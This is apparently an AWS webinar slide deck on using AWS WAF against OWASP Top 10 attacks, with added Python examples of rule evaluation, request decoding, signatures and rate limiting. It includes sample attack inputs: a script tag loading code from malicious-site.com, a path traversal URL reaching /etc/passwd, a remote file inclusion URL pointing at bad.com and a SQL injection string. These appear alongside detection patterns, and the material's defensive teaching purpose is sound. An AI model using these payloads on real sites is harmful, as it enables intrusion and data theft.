How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
The Open Web Application Security Project (OWASP) Top 10 identifies the most critical risks that web developers must address in their applications. AWS WAF, a web application firewall, helps you address the vulnerabilities identified by the OWASP Top 10. In this webinar, you will learn how to use AWS WAF to write rules to match common patterns of exploitation and block malicious requests from reaching your web servers.
  1. © 2017, Amazon Web Services, Inc. or its Affiliates. All rights reserved.
     Use AWS WAF to Mitigate OWASP’s Top 10 Web Application Vulnerabilities
     Sundar Jayashekar, Sr. Product Manager; Vlad Vlasceanu, Solutions Architect. 09/28/2017
  2. About Today’s Webinar
     • AWS WAF Overview
     • Mitigating Application Security Vulnerabilities
     • Overview of OWASP Top 10
     • Mitigating OWASP Top 10 Application Flaws
     Dive Deep:
     • Whitepaper: Use AWS WAF to Mitigate OWASP’s Top 10 Web Application Vulnerabilities
     • Toolkit: Companion CloudFormation Template containing example rules mitigating OWASP Top 10 vulnerabilities
  3. What is AWS WAF?
     • Protect websites and web applications against common web exploits
     • Mitigate risks impacting application availability, security, or driving excessive resource consumption
     • HTTP protocol request filtering engine
     • Prevent attacks with recognizable request signatures
     • Meet regulatory compliance requirements
     (Diagram: Good Users and Bad Folks reach AWS WAF, which sits in front of Your Application: Web App, Database)
  4. WAF Positioning in the Spectrum of Attacks
     (Diagram: a spectrum running from DDoS to targeted attacks, with WAF positioned in between. Labels: Reflection and amplification; Layer 3 & 4 floods; Slowloris; SSL abuse; HTTP floods; SQL injection; Bots and probes; Application exploits; Social engineering; Reverse engineering; XSS; RFI/LFI; Data Exposure)
  5. Implementing AWS WAF
     • Associations: Amazon CloudFront, Application Load Balancer
     • Web ACLs: ordered set of rules
     • Rules: match sets as predicates
     • Conditions (match sets):
       • SQL Injection
       • Cross Site Scripting (XSS)
       • IP Blacklisting/Whitelisting
       • Request Hygiene/Size Constraints
       • String Pattern Filtering
     • Standard Rules
     • Rate Based Rules (per 5 min interval)
     • Actions: Block, Allow, Count
     • Perimeter protection
  6. Strategies for Building a WAF Web ACL
     • Blacklisting:
       • Block bad patterns with rules; default action is ALLOW
       • More commonly used
     • Whitelisting:
       • Allow good patterns with rules; default action is BLOCK
       • Works best for defined, limited pattern sets
     • Mixed:
       • Considerations: rule ordering, bypass rules
     • Count effects:
       • Test pattern effectiveness with the COUNT rule action
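The ordered-rule, default-action and COUNT ideas from slides 5 and 6, worked through as an added example. This is constructed illustration code, not the AWS WAF API and not the companion CloudFormation template; the Request, Rule and WebACL classes, the predicate builders, the rule names and the 203.0.113.0/24 "corporate" range are all assumptions.

```python
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import Callable, Dict, List, Optional, Tuple

# Hypothetical, simplified model of the concepts on the slides (not the AWS WAF API):
# a web ACL is an ordered list of rules, each rule is a list of predicates
# (match conditions) that must all hold, and each rule carries an action.


@dataclass
class Request:
    client_ip: str
    uri: str
    query_string: str = ""
    headers: Dict[str, str] = field(default_factory=dict)


Predicate = Callable[[Request], bool]


@dataclass
class Rule:
    name: str
    predicates: List[Predicate]
    action: str  # "BLOCK", "ALLOW" or "COUNT"


@dataclass
class WebACL:
    rules: List[Rule]
    default_action: str  # "ALLOW" for a blacklist, "BLOCK" for a whitelist

    def evaluate(self, req: Request) -> Tuple[str, List[str], Optional[str]]:
        """Walk the rules in order; the first BLOCK/ALLOW match decides the request.
        Returns (final_action, names of COUNT rules that matched, deciding rule name)."""
        counted: List[str] = []
        for rule in self.rules:
            if all(pred(req) for pred in rule.predicates):
                if rule.action == "COUNT":
                    counted.append(rule.name)  # COUNT records the hit and keeps evaluating
                    continue
                return rule.action, counted, rule.name
        return self.default_action, counted, None


# Predicate builders standing in for IP address match and string match conditions.
def ip_match(cidrs: List[str]) -> Predicate:
    nets = [ip_network(c) for c in cidrs]
    return lambda r: any(ip_address(r.client_ip) in n for n in nets)


def uri_starts_with(prefix: str) -> Predicate:
    return lambda r: r.uri.startswith(prefix)


def negate(pred: Predicate) -> Predicate:
    return lambda r: not pred(r)


# Constructed address range (TEST-NET-3) standing in for the office the admins work from.
CORPORATE_CIDRS = ["203.0.113.0/24"]

# Blacklisting ACL: default ALLOW; admin paths are restricted to corporate IPs, and a
# candidate rule runs in COUNT mode so its effect can be measured before it blocks.
BLACKLIST_ACL = WebACL(
    default_action="ALLOW",
    rules=[
        Rule("admin-not-from-corporate",
             [uri_starts_with("/admin"), negate(ip_match(CORPORATE_CIDRS))], "BLOCK"),
        Rule("count-status-page-probes", [uri_starts_with("/server-status")], "COUNT"),
    ],
)

# Whitelisting ACL: default BLOCK; only the catalogue and checkout paths are allowed through.
WHITELIST_ACL = WebACL(
    default_action="BLOCK",
    rules=[
        Rule("allow-catalogue", [uri_starts_with("/products")], "ALLOW"),
        Rule("allow-checkout", [uri_starts_with("/checkout")], "ALLOW"),
    ],
)


if __name__ == "__main__":
    for acl_name, acl in (("blacklist", BLACKLIST_ACL), ("whitelist", WHITELIST_ACL)):
        for req in (Request("203.0.113.7", "/admin/users"),
                    Request("198.51.100.9", "/admin/users"),
                    Request("198.51.100.9", "/server-status")):
            print(acl_name, req.client_ip, req.uri, "->", acl.evaluate(req))
```

The COUNT rule never terminates evaluation, which is exactly what makes it safe to deploy a new pattern: the request still falls through to the remaining rules and the default action, while the count tells you how often the pattern would have fired. Rule ordering matters in the mixed case: a bypass rule such as the corporate-IP allowance has to come before the rule it is meant to bypass.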
  7. OWASP Top 10 (2013 & 2017 RC)
     Represents a broad consensus about what the most critical web application security flaws are
     • A1 Injection
     • A2 Broken Auth. & Session Mgmt.
     • A3 Cross-Site Scripting (XSS)
     • A4 Broken Access Control
     • A5 Security Misconfiguration
     • A6 Sensitive Data Exposure
     • A7 Insufficient Attack Protection
     • A8 Cross-Site Request Forgery (CSRF)
     • A9 Using Components with Known Vulnerabilities
     • A10 Underprotected APIs
     (2013 list: A10 Unvalidated Redirects and Forwards. Three entries are marked "New" on the slide.)
  8. QuackyNature.com is the leading online retailer of Widgets. They are constantly under attack by malicious actors trying to steal sensitive data, such as payment information and customer, pricing or supplier information. You are their new Security Engineer, tasked with protecting their data and mitigating attacks…
  9. Mitigating Application Security Threats
     An application-oriented approach:
     ✓ Securing the specific application profile: mitigate risks of exploiting QuackyNature.com application-specific flaws (code, configurations, features)
     ✓ Mitigating common attack vectors: protect QuackyNature.com from common attacks
     ✓ Keeping up with a changing landscape
  10. Using WAF to Mitigate OWASP Top 10
     AWS WAF can mitigate application flaws in the OWASP Top 10 categories
     • A WAF does not fix the underlying flaws; it limits the ability to exploit them
     • The ability to derive a recognizable HTTP request pattern is key to effectiveness
     • The ability to keep up with changes in attack patterns is important
  11. Know Your Specific Application Profile
     Know your application in-depth, even if it’s an open source/commercial off-the-shelf product
     1. What services/URL paths does it expose to the web? Keep the exposure footprint low
     2. Know the packages, libraries and components your application is leveraging, and the additional features and services they expose
     3. Keep them all up-to-date, and install security patches in a timely manner
  12. A1 – Injection
     Injection flaw: the application sends untrusted data to an interpreter, with the risk of altering the original intent of the request. Most well known are SQL Injection flaws.
     (Image credit: XKCD, "Exploits of a Mom", published by permission.)
  13. A1 – Injection
     Mitigate using AWS WAF SQL injection match conditions
     • What HTTP request components should you scan?
       • Query String, URI, Body, Cookie and/or Authorization Header
     • What transformations should you apply?
       • URL Decode, Decode HTML Entities
     • What about other injection types?
       • Use string match conditions
  14. A3 – Cross-Site Scripting (XSS)
     XSS flaw: including user-provided data in web pages without proper sanitization. Malicious scripts or objects can be embedded in user pages.
     (Example comment form on the slide: Your Comment: <script src="https://malicious-site.com/exploit.js" type="text/javascript" /> [SEND])
  15. A3 – Cross-Site Scripting (XSS)
     Mitigate using AWS WAF cross-site scripting match conditions
     • What HTTP request components should you scan?
       • Body, Query String, Cookie Header, URI
     • What transformations should you apply?
       • URL Decode, Decode HTML Entities
     • What content types are allowed in the HTTP request?
       • Risk of false positives if not HTML content
  16. A4 – Broken Access Control
     Flaws due to lack of, or improper enforcement of, restrictions on what users are allowed to do:
     • Manipulation of internal application objects
     • Component/function-level access control issues
     • Path traversal attacks, local or remote file inclusion (LFI/RFI)
     Permission validation flaws are difficult to mitigate by any WAF without user context.
     Example: https://example.com/download.php?file=..%2F..%2Fetc%2Fpasswd
  17. A4 – Broken Access Control
     • Filter dangerous patterns that might indicate path traversal or file inclusion using string match conditions
     • Limit access to administrative modules or components to a known set of users from known locations using string match conditions and IP address match conditions
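Slides 13, 15 and 17 all rest on the same mechanism: pick the request components to scan, apply text transformations (URL decode, then decode HTML entities) so encoding cannot hide a pattern from the condition, then test the match. The following added example models that pipeline; it is constructed illustration code, not AWS WAF's own SQL injection or XSS detection and not the companion template. The condition names, the component names, the narrow regular expressions used as signatures and the sample requests are assumptions, except for the path traversal URL and the script tag, which are the slides' own examples.

```python
import html
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Text transformations named on the slides, applied in the listed order before matching.
# Constructed model of the idea, not the AWS WAF implementation.
TRANSFORMS = {
    "URL_DECODE": unquote_plus,
    "HTML_ENTITY_DECODE": html.unescape,
    "LOWERCASE": str.lower,
}


def apply_transforms(value: str, transforms: List[str]) -> str:
    for name in transforms:
        value = TRANSFORMS[name](value)
    return value


# Hypothetical match conditions: (name, components to scan, transformations, signature).
# The signatures are deliberately narrow illustrations, not a production rule set.
MATCH_CONDITIONS = [
    ("sqli",
     ["QUERY_STRING", "URI", "BODY", "HEADER:cookie", "HEADER:authorization"],
     ["URL_DECODE", "HTML_ENTITY_DECODE", "LOWERCASE"],
     re.compile(r"\bor\b\s+\d+\s*=\s*\d+|\bunion\b\s+\bselect\b|--\s*$")),
    ("xss",
     ["BODY", "QUERY_STRING", "HEADER:cookie", "URI"],
     ["URL_DECODE", "HTML_ENTITY_DECODE", "LOWERCASE"],
     re.compile(r"<\s*script\b|javascript\s*:|\bon(load|error|click|mouseover)\s*=")),
    ("path_traversal",
     ["URI", "QUERY_STRING"],
     ["URL_DECODE"],
     re.compile(r"\.\./|\.\.\\")),
]


def component(req: Dict, name: str) -> str:
    """Fetch a request component by the slides' names (URI, QUERY_STRING, BODY, HEADER:x)."""
    if name.startswith("HEADER:"):
        return req.get("headers", {}).get(name.split(":", 1)[1], "")
    return req.get(name.lower(), "")


def scan(req: Dict) -> List[Tuple[str, str]]:
    """Return (condition, component) pairs whose transformed text hits a signature."""
    hits = []
    for cond_name, components, transforms, pattern in MATCH_CONDITIONS:
        for comp in components:
            if pattern.search(apply_transforms(component(req, comp), transforms)):
                hits.append((cond_name, comp))
    return hits


# Constructed requests. "traversal" is the slide's own example URL; "xss" carries the
# slide's script tag, HTML-entity encoded and then URL encoded, to show why both decodes
# must run before a match condition can see it; "sqli" is a textbook tautology.
SAMPLE_REQUESTS = {
    "benign":    {"uri": "/products", "query_string": "category=ducks&sort=price"},
    "traversal": {"uri": "/download.php", "query_string": "file=..%2F..%2Fetc%2Fpasswd"},
    "xss":       {"uri": "/comment",
                  "body": "text=%26lt%3Bscript%20src%3D%22https%3A%2F%2Fmalicious-site.com"
                          "%2Fexploit.js%22%26gt%3B"},
    "sqli":      {"uri": "/login", "body": "user=admin%27+OR+1%3D1--"},
}

if __name__ == "__main__":
    for label, req in SAMPLE_REQUESTS.items():
        print(label, "->", scan(req))
```

Two design points carry over to real rules. First, the "xss" body only matches because URL decoding runs before HTML entity decoding; with either transformation missing the signature sees `%26lt%3B` or `&lt;` rather than `<`. Second, the XSS handler signature is limited to a few event names rather than `on\w+=` because the looser form would fire on ordinary parameters such as `online=1`, which is the false-positive risk slide 15 warns about; a COUNT rule is the right way to find out how often a candidate signature fires on legitimate traffic before it blocks anything.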
  18. A5 – Security Misconfigurations
     Default configurations aren’t always fit for purpose; recommended defaults also change over time
     Examples:
     • Leaving Apache’s ServerTokens Full in production
     • Leaving default directory listings enabled in production web servers
     • Application framework configurations that return stack traces in production
     • Bad/old insecure default configurations for runtimes, interpreters, etc.
  19. A5 – Security Misconfigurations
     WAF mitigation strategies:
     • Block or restrict access to paths for administrative consoles, configuration or status pages installed or enabled by default
     • Protect against known attack patterns specific to your platform, especially for legacy apps reliant on old platform behavior. Use string match conditions to match relevant patterns.
     Example: http://example.com/?_SERVER[DOCUMENT_ROOT]=http://bad.com/bad.htm
  20. A7 – Insufficient Attack Protection
     Category proposed and rejected in the 2017 release candidate review; it still contains valuable lessons
     Key coverage:
     • HTTP request hygiene enforcement
     • Adaptability to changing attack patterns
     • Anomaly detection and reaction
     • Validation of control effectiveness
  21. A7 – Insufficient Attack Protection
     WAF mitigation strategies:
     • Use size constraint conditions to limit the size of HTTP request components to application-relevant maximums
     • Use rate-based rules to detect abnormal request volumes, or changes in such volumes
     • Use AWS WAF Security Automations for capabilities reacting to abnormal conditions:
       • Scanner and probe mitigation
       • Known attacker origin mitigation (reputation lists)
       • Bot and scraper mitigation
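The two A7 controls on slide 21, a rate-based rule evaluated per 5-minute interval and size constraints per request component, as an added example. It is constructed illustration code rather than AWS WAF's implementation; the sliding-window bookkeeping, the byte limits in SIZE_LIMITS, the toy request limit and the access log are all assumptions.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

# Constructed model of the two A7 controls on the slide (not the AWS WAF implementation):
# a rate-based rule counting requests per client IP over a trailing 5-minute interval,
# and a size constraint condition with application-relevant maximums per component.

WINDOW_SECONDS = 300  # the slide's "per 5 min interval"


class RateBasedRule:
    def __init__(self, limit: int, window: int = WINDOW_SECONDS):
        self.limit = limit
        self.window = window
        self.seen: Dict[str, Deque[float]] = defaultdict(deque)

    def observe(self, client_ip: str, ts: float) -> bool:
        """Record one request; return True when this IP's count in the trailing
        window exceeds the limit, i.e. when the rule would match."""
        q = self.seen[client_ip]
        q.append(ts)
        while q and q[0] <= ts - self.window:  # drop timestamps outside the window
            q.popleft()
        return len(q) > self.limit


def replay(rule: RateBasedRule, log: List[Tuple[float, str]]) -> List[Tuple[float, str]]:
    """Feed a (timestamp, client_ip) log through the rule; return the requests it would block."""
    return [(ts, ip) for ts, ip in log if rule.observe(ip, ts)]


# Hypothetical maximums in bytes for a catalogue/checkout app; tune these per application.
SIZE_LIMITS = {"URI": 512, "QUERY_STRING": 1024, "BODY": 8192, "HEADER:cookie": 4096}


def size_violations(req: Dict, limits: Dict[str, int] = SIZE_LIMITS) -> List[str]:
    """Names of request components whose byte length exceeds the configured maximum."""
    over = []
    for name, maximum in limits.items():
        if name.startswith("HEADER:"):
            value = req.get("headers", {}).get(name.split(":", 1)[1], "")
        else:
            value = req.get(name.lower(), "")
        if len(value.encode("utf-8")) > maximum:
            over.append(name)
    return over


# Constructed access log: client A bursts six requests in 50 seconds, B stays quiet,
# then A returns after the window has elapsed and is counted afresh.
SAMPLE_LOG = [(0, "A"), (10, "A"), (20, "A"), (30, "A"), (40, "A"), (50, "A"),
              (60, "B"), (70, "B"), (400, "A")]

if __name__ == "__main__":
    print("blocked:", replay(RateBasedRule(limit=5), SAMPLE_LOG))
    print("oversized:", size_violations({"uri": "/upload", "body": "x" * 9000}))
```

The limit of five is only there to make the constructed log readable; the service enforces its own minimum for a rate-based rule's limit, so a real rule is set from observed peak legitimate volume per client, not from a guess. Size limits are measured in bytes after encoding, so multi-byte characters count more than once, which is the behaviour you want when the maximum exists to bound parsing work on the backend.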
  22. A9 – Components w/ Known Vulnerabilities
     One of the most prevalent attack vectors
     • Use of vulnerable components due to legacy constraints
     • Use of vulnerable sub-components due to dependencies
     • Use of vulnerable components due to lack of flaw tracking/reporting
     Using WAF to mitigate:
     • Block HTTP requests to unused functionality of components
     • Block HTTP requests to server-side components in the public web path
  23. Demo
  24. Thank You!